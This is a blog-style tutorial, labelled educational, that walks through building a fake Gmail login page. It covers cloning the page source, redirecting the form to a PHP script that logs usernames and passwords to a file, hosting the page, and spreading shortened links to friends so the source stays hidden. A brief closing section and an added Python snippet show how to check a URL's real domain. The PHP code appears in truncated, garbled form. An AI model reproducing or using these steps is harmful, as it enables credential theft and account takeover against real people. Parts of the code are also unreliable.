Attention: This post is for educational purposes.
In this post I’ll be guiding you and sharing knowledge on:
- What is a Phishing Page/Social Engineering
- How are Phishing Pages made
- How to defend yourself from phishing pages/social engineering
What is a Phishing Page/Social Engineering
Phishing is a particularly popular scam in which a party creates an official-looking web page that asks you to provide your username and password, or other personal information such as your Social Security number, bank account number, PIN number, credit card number, or mother’s maiden name or birthday.
In many cases, you’ll receive a link to this phishing page via an email which claims to come from an official-looking (but probably forged) address. You can also end up at these pages by following links that you find on the web or in IM messages.
How are Phishing Pages made
Lets make a Gmail Phishing Page for example

Step 1:
Open gmail.com and right click on the page. You will see many options, just select View page source.

Step 2:
Now simply copy the entire code (press CTRL+A and then CTRL+C of your keyboard for copying the entire code). After copying the code open notepad and paste the code by pressing CTRL+V.

Step 3:
Scroll to the top and press CTRL+F of your keyboard. You will get a dialogue box on your screen. Simply type “action=” in the space provided without inverted commas. And hit enter.

Step 4:
Replace the link corresponding to action= with post.php see image below,it will make it clearer.

Step 5:
Open a new notepad file and simply copy and paste the below code. You can also modify the code as this code redirects the victims to a new page after he enters his password and username.
If you want the user to get redirected to original/genuine gmail.com page after writing his password and user name leave it as it is and if you want to redirect the victim to some new site replace “http://www.gmail.com/” with desired site name in the below code.
$value) { fwrite($handle, $variable); fwrite($handle, “=”); fwrite($handle, $value); fwrite($handle, “\r\n”); } fwrite($handle, “\r\n”); fclose($handle); exit; ?>Save the file as post.php
Now you have completes making your Phishing page ,open index.html to see your phishing page. If page looks fine then skip to uploading the file to site.
Step 6:
When you will open index.html you will see that your phishing page is not as same as Gmail original/genuine page ,it is missing many images and logo.
So,it’s time to fix them.
All you have to do is open index.html in notepad .Just make a right click on index.html and hover over open with and select notepad.
Press CTRL+F of your keyword to find the following links and replace the following links with corresponding links:
- Firstly Find: //ssl.gstatic.com/accounts/ui/logo_2x.png for fixing Google logo.
- Replace it with: http://i.imgur.com/8aPqK7U.png
- Secondly, Find: //ssl.gstatic.com/accounts/ui/avatar_2x.png for fixing avatar.
- Replace it with: http://i.imgur.com/cADQ5wi.png
- Thirdly Find: //ssl.gstatic.com/accounts/ui/logo_strip_2x.png for fixing logo strip
- And replace it with: http://i.imgur.com/O1V8kOU.png
- Lastly Find: //ssl.gstatic.com/images/icons/ui/common/universal_language_settings-21.png for fixing language icon.
- And replace it with: http://i.imgur.com/2reaCDM.png
Now save your work and again open index.html by double clicking and you will see all the things have been fixed and your page looks exactly like original Gmail page.
Now its time to host your gmail phishing page(both index.html and post.php) in hosting sites.
To learn how to host phishing page to hosting site for free, please visit my tutorial “How to upload your website to hosting page for FREE“
After uploading the files all you have to do is start spreading your link to your friends and whenever they will click on the link they will be redirected to gmail.com and whenever they will enter the username and password you will also get the username and password of your friend.
Note: You can shorten your link with link shortening sites so that victim don’t get to know that the link is from a free hosting site. Or you can buy hosting from : Ipage Hosting and get your Phishing Page going…!!
How to defend yourself from phishing pages/social engineering
The best thing to do is to check the page’s URL to make sure it’s actually controlled by the party it appears to be controlled by. The crucial part of the URL is the part between the http:// (or https://) and the next slash (‘/’). (If there’s no slash, this part runs to the end of the URL.) This is the part of the URL that determines site ownership. Some popular domains, for instance, are amazon, google, and ebay:
In some cases, URLs will be a bit more complex; be sure to check the name listed immediately to the left of the top level domain (.com, .net, .co.uk, etc.).
For instance, http://www.google.com, http://news.google.com and http://www.google.com/firefox/ are all part of the same site. However, google.com.fraudulentdomain.com/login.html is NOT! Neither is www.g00gle.com (note that in this URL, the letter o is replaced by the number 0).
Tip: Since a forged URL can look very similar to a genuine one, it’s safer to use a bookmark you’ve created or to type the URL into the location bar by hand instead of following links from your email. This is important for any page where you’re asked to log in or provide private information.
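The ownership check described above, written out as an added example (not code from the original post). It is run over the URLs listed in this section; the short suffix set, the digit-for-letter map and the function names are assumptions made for this illustration, and a real check would load the full Public Suffix List.

```python
from urllib.parse import urlsplit

# Constructed, deliberately tiny set of multi-label suffixes (assumption);
# production code should use the full Public Suffix List instead.
MULTI_LABEL_SUFFIXES = {"co.uk", "org.uk", "com.au", "co.jp"}
# Constructed digit-for-letter map used only for the lookalike check.
LOOKALIKES = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s"})


def hostname(url: str) -> str:
    """Return the lowercase host: the part between the scheme and the next slash."""
    if "://" not in url:
        url = "http://" + url  # bare "example.com/path" as it appears in mail bodies
    return (urlsplit(url).hostname or "").rstrip(".")


def registrable_domain(host: str) -> str:
    """Name immediately left of the top-level domain, plus that suffix."""
    labels = host.split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def classify(url: str, expected: str) -> str:
    """Compare the domain that owns a link with the domain the user expects."""
    domain = registrable_domain(hostname(url))
    if domain == expected:
        return "match"
    if domain.translate(LOOKALIKES) == expected.translate(LOOKALIKES):
        return "lookalike"  # same name once digits are read as letters
    return "different-owner"


if __name__ == "__main__":
    # URLs taken from the text of this section.
    for link in (
        "http://www.google.com",
        "http://news.google.com",
        "http://www.google.com/firefox/",
        "google.com.fraudulentdomain.com/login.html",
        "www.g00gle.com",
    ):
        print(f"{classify(link, 'google.com'):16} {hostname(link)}")
```

Only "match" means the link belongs to the expected site; both other results should be treated as a different owner, with "lookalike" marking a name built to be misread.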
Congratulations!!! Now you are one step closer to cyber security. I’ll be uploading more posts on cyber security/ethical hacking. Stay tuned.